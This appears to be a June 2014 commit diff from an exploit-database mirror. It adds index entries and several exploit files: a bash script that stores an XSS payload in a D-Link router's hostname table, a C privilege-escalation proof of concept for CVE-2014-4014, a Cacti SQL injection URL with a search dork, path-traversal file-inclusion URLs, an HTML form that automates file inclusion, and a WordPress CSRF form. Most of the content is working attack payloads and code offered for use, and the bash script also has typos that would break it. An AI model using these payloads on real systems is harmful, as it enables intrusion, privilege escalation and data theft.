Updated 06_22_2014

files.csv

@@ -30336,6 +30336,7 @@ id,file,description,date,author,platform,type,port
 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0
 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
+33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service Vulnerability",2010-02-24,Nicob,linux,dos,0
 33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0
 33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
 33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0
@@ -30456,6 +30457,7 @@ id,file,description,date,author,platform,type,port
 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
 33808,platforms/linux/local/33808.c,"docker 0.11 VMM-container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
+33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component 'id' Parameter SQL Injection Vulnerability",2010-03-29,"Pouya Daneshmand",php,webapps,0
@@ -30466,3 +30468,8 @@ id,file,description,date,author,platform,type,port
 33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,metasploit,windows,remote,8080
 33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80
 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway Prior To 6.7.2 Hotfix 2 Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0
+33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0
+33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Include Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0
+33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0
+33823,platforms/php/webapps/33823.txt,"Wordpress 3.9.1 - CSRF vulnerabilities",2014-06-21,"Avinash Thapa",php,webapps,0
+33824,platforms/linux/local/33824.c,"Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0

platforms/hardware/webapps/33822.sh

@@ -0,0 +1,32 @@
+#!/bin/bash
+
+# Written and discovered by Yuval tisf Nativ
+# The page 'dhcpinfo.html' will list all machines connected to the network with hostname, 
+# IP, MAC and IP expiration. It is possible to store an XSS in this table by changing hostname. 
+
+# Checks if you are root
+if [ "$(id -u)" != "0" ]; then
+	echo "Please execute this script as root"
+	exit 1
+fi	
+
+# You're XSS here
+xss = "\"<script>alert('pwned');</script>"
+
+# backup current hostname
+currhost = `hostname`
+
+# Bannering
+echo ""
+echo "		D-Link Persistent XSS by tisf"
+echo ""
+echo "The page dhcpinfo.html is the vulnerable page."
+echo "Ask the user to access it and your persistent XSS will be triggered."
+echo ""
+
+# Change hostname to XSS
+sudo hosname $xss
+
+# Restore previous hostname on exit
+pause "Type any key to exit and restore your previous hostname."
+sudo hostname $currhost

platforms/linux/dos/33672.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/38395/info
+
+Kojoney is prone to a remote denial-of-service vulnerability.
+
+A remote attacker can exploit this issue to gain unauthorized access to local files and crash the affected application, resulting in a denial-of-service condition.
+
+Versions prior to Kojoney 0.0.4.2 are vulnerable. 
+
+The following example URI is available:
+
+file://localhost/dev/urandom 

platforms/linux/local/33824.c

@@ -0,0 +1,72 @@
+/**
+ * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
+ *
+ * Vitaly Nikolenko
+ * http://hashcrack.org
+ *
+ * Usage: ./poc [file_path]
+ * 
+ * where file_path is the file on which you want to set the sgid bit
+ */
+#define _GNU_SOURCE
+#include <sys/wait.h>
+#include <sched.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <string.h>
+#include <assert.h>
+
+#define STACK_SIZE (1024 * 1024)
+static char child_stack[STACK_SIZE];
+
+struct args {
+    int pipe_fd[2];
+    char *file_path;
+};
+
+static int child(void *arg) {
+    struct args *f_args = (struct args *)arg;
+    char c;
+
+    // close stdout
+    close(f_args->pipe_fd[1]); 
+
+    assert(read(f_args->pipe_fd[0], &c, 1) == 0);
+
+    // set the setgid bit
+    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
+
+    return 0;
+}
+
+int main(int argc, char *argv[]) {
+    int fd;
+    pid_t pid;
+    char mapping[1024];
+    char map_file[PATH_MAX];
+    struct args f_args;
+
+    assert(argc == 2);
+
+    f_args.file_path = argv[1];
+    // create a pipe for synching the child and parent
+    assert(pipe(f_args.pipe_fd) != -1);
+
+    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
+    assert(pid != -1);
+
+    // get the current uid outside the namespace
+    snprintf(mapping, 1024, "0 %d 1\n", getuid()); 
+
+    // update uid and gid maps in the child
+    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
+    fd = open(map_file, O_RDWR); assert(fd != -1);
+
+    assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
+    close(f_args.pipe_fd[1]);
+
+    assert (waitpid(pid, NULL, 0) != -1);
+}

platforms/php/webapps/33809.txt

@@ -0,0 +1,21 @@
+ $$$$$$\      $$\   $$\     $$$$$$\  
+$$  __$$\     $$ |  $$ |   $$  __$$\ 
+$$ /  \__|    $$ |  $$ |   $$ /  \__|
+$$ |$$$$\     $$$$$$$$ |   \$$$$$$\  
+$$ |\_$$ |    $$  __$$ |    \____$$\ 
+$$ |  $$ |    $$ |  $$ |   $$\   $$ |
+\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
+ \______/ \__|\__|  \__|\__|\______/ 
+ 
+# Exploit Title: Cacti - Superlinks Plugin SQL Injection
+# Google Dork: inurl:"/cacti/plugins/superlinks/"
+# Date: 18/06/2014
+# Exploit Author: Napsterakos
+# Software Link: http://docs.cacti.net/plugin:superlinks
+
+
+Link: http://localhost/cacti/plugins/superlinks/
+
+Exploit: http://localhost/cacti/plugins/superlinks/superlinks.php?id=[SQLi]
+
+Credits to: Greek Hacking Scene

platforms/php/webapps/33820.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/39276/info
+
+PotatoNews is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+PotatoNews 1.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/newcopy/timeago.php?nid=../../../../../../../[file]%00
+http://www.example.com/update/timeago.php?nid=../../../../../../../[file]%00 

platforms/php/webapps/33821.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39298/info
+
+n-cms-equipe is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+n-cms-equipe 1.1C-Debug is vulnerable; other versions may also be affected. 
+
+<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>#####coded by ahmadbady#####</title> <script language="JavaScript"> //=========================================================================== //( #Topic : N'CMS Updated 2010-02-24 //( #Bug type : local file include //( #Download : http://sourceforge.net/projects/n-cms/files/N-CMS%20Equipe/n-cms-equipe-V1.1C-Debug.zip/download //( #Advisory : //=========================================================================== //( #Author : ItSecTeam //( #Email : Bug@ITSecTeam.com # //( #Website: http://www.itsecteam.com # //( #Forum : http://forum.ITSecTeam.com # //--------------------------------------------------------------------- var variable1 ="?page=" var variable2 ="?tData[name]=" function it(){ if (xpl.file.value=="includs.php"){ variable1 = variable2; } xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+variable1+xpl.file0.value;xpl.submit(); } </script> </head> <body bgcolor="#FFFFFF"> <p align="left"><font color="#0000FF">N'CMS & N'Games local file include Vulnerability</font></p> <p align="left"><font color="#FF0000">vul1 file:/path/template/theme1/content/body.php</font></p> <p align="left"><font color="#FF0000">vul2 file:/path/template/theme1/content/includs.php</font></p> <p align="left"><font color="#0000FF">-----------------------------------</font></p> <form method="post" name="xpl" onSubmit="it();"> <p align="left"> <font size="2" face="Tahoma"> victim: <input type="text" name="victim" size="20";" style="color: #FFFFFF; background-color: #000000" value="http://127.0.0.1"> path: <input type="text" name="path" size="20";" style="color: #FFFFFF; background-color: #000000" value="/path/template/theme1/content/"> file: <input type="text" name="file" size="20";" style="color: #FFFFFF; background-color: #000000">&nbsp;&nbsp; lfi code:&nbsp; <input type="text" name="file0" size="20";" style="color: #FFFFFF; background-color: #000000" value="..%2F..%2F..%2F..%2F..%2Fboot.ini%00"></p> </p> <center> </p> <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" value="reset" name="B2" style="float: left"></p> </form> <p><br> &nbsp;</p> </center> </body> </html> 

platforms/php/webapps/33823.txt

@@ -0,0 +1,80 @@
+# EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability
+# DATE:21st June,2014
+
+# Author:Avinash Kumar Thapa
+
+#URL: localhost/wordpress/
+
+#PATCH/FIX:Not fixed yet.
+
+
+
+
+###################################################################################################
+
+Technical Details:
+
+This is the new version released by Wordpress.
+
+version is 3.9.1(Latest)
+
+##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php##
+
+
+
+
+#####################################################################################################
+
+Exploit Code:
+
+
+
+
+
+<html>
+
+  <!-- CSRF PoC - generated by **Avinash Kumar Thapa** -->
+
+  <body>
+
+    <form action="http://localhost/wordpress/wp-comments-post.php" method="POST">
+
+      <input type="hidden" name="author" value="Anonymous" />
+
+      <input type="hidden" name="email" value="helloworld&#64;outlook&#46;com" />
+
+      <input type="hidden" name="url" value="www&#46;random&#46;com" />
+
+      <input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" />
+
+      <input type="hidden" name="submit" value="Post&#32;Comment" />
+
+      <input type="hidden" name="comment&#95;post&#95;ID" value="1" />
+
+      <input type="hidden" name="comment&#95;parent" value="0" />
+
+      <input type="submit" value="Submit form" />
+
+    </form>
+
+  </body>
+
+</html>
+
+
+
+
+###########################################################################################################
+
+----
+
+-- Avinash
+
+a.k.a
+
+**SPID3R**
+
+
+
+
+twitter: @m_avinash143<https://twitter.com/m_avinash143>